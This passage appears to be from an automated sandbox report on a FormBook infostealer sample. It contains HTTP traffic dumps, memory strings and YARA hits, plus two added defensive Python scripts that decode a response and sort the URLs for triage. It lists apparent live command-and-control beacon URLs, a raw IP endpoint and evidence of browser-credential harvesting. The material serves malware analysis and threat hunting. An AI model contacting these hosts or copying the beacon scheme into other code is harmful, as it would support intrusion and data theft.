67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:44:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:44:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:45:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:45:03 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
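Every HTTP response in the traffic section above is an nginx 404: the plain 148-byte and 548-byte bodies are nginx's stock error page (the 548-byte variant carries the "padding to disable MSIE and Chrome friendly error page" comments), and the 15:43:30 response is a reg.ru parking page for www.les-massage.online (readable in its hex: the title tag and a meta tag "parking" / "regru-rdap"). The responses sent with Content-Encoding: gzip, however, are shown only as raw hex, so their "Data Ascii" column is garbage. The script below is an added example, not part of the report: it de-chunks and gunzips the "Data Raw" bytes of the 15:44:18 GMT response, which are copied from the page. The gzip trailer's ISIZE field already states the decoded length (548 bytes, the same as the uncompressed nginx page returned at 15:44:26), which is what the test checks.

```python
import binascii
import gzip
import struct

# "Data Raw" column of the 15:44:18 GMT response in this report (Transfer-Encoding: chunked,
# Content-Encoding: gzip), copied from the page: one chunk of 0xaa = 170 bytes holding a gzip
# member, then the terminating "0\r\n\r\n" chunk.
RAW_HEX = (
    "61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 "
    "b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 "
    "8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb "
    "7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc "
    "72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f "
    "77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 "
    "64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 "
    "c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 "
    "1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 "
    "33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 "
    "ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a "
    "30 0d 0a 0d 0a"
)


def dechunk(data: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-coded body (RFC 9112, section 7.1)."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        # chunk-size is hex and may carry ";name=value" chunk extensions
        size = int(data[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            break  # last-chunk; optional trailer fields follow and are ignored here
        out += data[pos:pos + size]
        pos += size + 2  # step over the CRLF that terminates chunk-data
    return bytes(out)


def gzip_isize(member: bytes) -> int:
    """ISIZE from the gzip trailer: uncompressed length mod 2**32 (RFC 1952, section 2.3.1)."""
    return struct.unpack("<I", member[-4:])[0]


def decode_response_body(hexdump: str, chunked: bool, gzipped: bool) -> bytes:
    """Turn a sandbox 'Data Raw' hex dump back into the bytes the client actually received."""
    data = binascii.unhexlify(hexdump.replace(" ", ""))
    if chunked:
        data = dechunk(data)
    if gzipped:
        if data[:2] != b"\x1f\x8b":
            raise ValueError("body is not a gzip member")
        data = gzip.decompress(data)  # verifies CRC32 and ISIZE from the trailer
    return data


def summarize(hexdump: str = RAW_HEX) -> dict:
    """Sizes before/after decoding plus a check that the page is nginx's stock 404."""
    member = dechunk(binascii.unhexlify(hexdump.replace(" ", "")))
    body = decode_response_body(hexdump, chunked=True, gzipped=True)
    return {
        "compressed_len": len(member),
        "isize": gzip_isize(member),
        "decoded_len": len(body),
        "is_nginx_404": b"404 Not Found" in body and b"nginx" in body,
    }


if __name__ == "__main__":
    print(summarize())
    print(decode_response_body(RAW_HEX, chunked=True, gzipped=True).decode("utf-8", "replace"))
```

The same function handles the plain responses (chunked=False, gzipped=False) and the parking page (chunked=True, gzipped=False); only the hex needs to be pasted in. A beacon that receives nothing but generic 404s from every contacted host is consistent with FormBook's habit of cycling through decoy domains, but it also means the real panel path was never confirmed from this run.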
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000075EE000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4629372081.00000000068A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000058FE000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://156.226.108.98:58888/
Source: drBzjAnGBElC.exe, 00000003.00000002.4633344393.000000000822E000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.deefbank.net
Source: drBzjAnGBElC.exe, 00000003.00000002.4633344393.000000000822E000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.deefbank.net/1y6y/
Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://htmlcodex.com
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://htmlcodex.com/credit-removal
Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: replace.exe, 00000004.00000003.2461311982.00000000082C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: replace.exe, 00000004.00000002.4619808862.000000000338E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.les-massage.online&rand=
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://reg.ru
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000075EE000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4629372081.00000000068A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000058FE000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://t.me/AG09999
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007912000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005C22000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULp
Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_l
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_land
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.les-massage.online&utm_medium=parking&u
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.les-massage.online&amp;reg_source=parking_auto
Source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000072CA000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000055DA000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.rtpngk.xyz/876i/?i4fTbV=Kmyw
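The string list above mixes three things that should not be read as one set of indicators: the beacon URLs on www.deefbank.net/1y6y/ and www.rtpngk.xyz/876i/ (both carrying the same query key i4fTbV), the reg.ru parking page and the CDN, font and jQuery assets it loads, which ended up in memory because a contacted domain was parked, and the search-engine and login.live.com URLs, which come from the browser profile that replace.exe read (see "Tries to harvest and steal browser information" in the overview), not from the malware's own configuration. The script below is an added triage example, not part of the report: it sorts the URLs above into those buckets using what is observable on this page (a short alphanumeric directory under the host root with at most one query parameter, a raw IP on a non-standard port) and then reports query-parameter names that recur across beacon hosts. The benign host allow-list is an assumption made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# URLs copied from the "String found in binary or memory" list above (a representative subset).
REPORT_URLS = [
    "http://156.226.108.98:58888/",
    "http://www.deefbank.net",
    "http://www.deefbank.net/1y6y/",
    "https://ac.ecosia.org/autocomplete?q=",
    "https://cdn.jsdelivr.net/npm/bootstrap",
    "https://duckduckgo.com/ac/?q=",
    "https://fonts.googleapis.com/css2?family=Heebo:wght",
    "https://login.live.com/oauth20_desktop.srf?lc=1033",
    "https://parking.reg.ru/script/get_domain_data?domain_name=www.les-massage.online&rand=",
    "https://t.me/AG09999",
    "https://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULp",
    "https://www.google.com/images/branding/product/ico/googleg_lodp.ico",
    "https://www.reg.ru/whois/?check=&dname=www.les-massage.online&amp;reg_source=parking_auto",
    "https://www.rtpngk.xyz/876i/?i4fTbV=Kmyw",
]

# Assumption for this example: hosts explained by a parked decoy domain (reg.ru and the assets
# its page loads) or by the harvested browser profile (search engines, Microsoft login), not by
# the malware's own infrastructure.
BENIGN_HOSTS = (
    "reg.ru", "jsdelivr.net", "cloudflare.com", "googleapis.com", "gstatic.com",
    "jquery.com", "ecosia.org", "duckduckgo.com", "yahoo.com", "google.com",
    "live.com", "htmlcodex.com", "googletagmanager.com",
)

# Observable in this report: a short alphanumeric directory directly under the host root
# (/1y6y/, /876i/) with at most one query parameter.
BEACON_PATH = re.compile(r"^/[A-Za-z0-9]{3,6}/$")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def host_matches(host: str, suffixes) -> bool:
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify(url: str) -> str:
    u = urlsplit(url)
    host = u.hostname or ""
    if host_matches(host, BENIGN_HOSTS):
        return "benign-residue"
    if IPV4.match(host) and u.port not in (None, 80, 443):
        return "raw-ip-nonstandard-port"
    params = parse_qsl(u.query, keep_blank_values=True)
    if BEACON_PATH.match(u.path) and len(params) <= 1:
        return "c2-beacon-candidate"
    return "unclassified"


def triage(urls=REPORT_URLS) -> dict:
    buckets = defaultdict(list)
    for url in urls:
        buckets[classify(url)].append(url)
    # A query-parameter name that recurs on different beacon hosts is specific to this build's
    # configuration and therefore a better hunting pivot than any single domain.
    hosts_by_key = defaultdict(set)
    for url in buckets["c2-beacon-candidate"]:
        u = urlsplit(url)
        for key, _ in parse_qsl(u.query, keep_blank_values=True):
            hosts_by_key[key].add(u.hostname)
    shared = {k: sorted(h) for k, h in hosts_by_key.items() if len(h) > 1}
    return {"buckets": dict(buckets), "shared_query_keys": shared}


if __name__ == "__main__":
    for bucket, urls in triage()["buckets"].items():
        print(bucket, *urls, sep="\n  ")
    print("shared query keys:", triage()["shared_query_keys"])
```

Whatever stays in "unclassified" (here the bare www.deefbank.net and the t.me link) is exactly what deserves a manual look; the script only removes the noise that a parked domain and a stolen browser profile add to a memory-strings listing.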
Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
Source: C:\Users\user\Desktop\PO2024033194.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

Source: Yara match | File source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

Source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
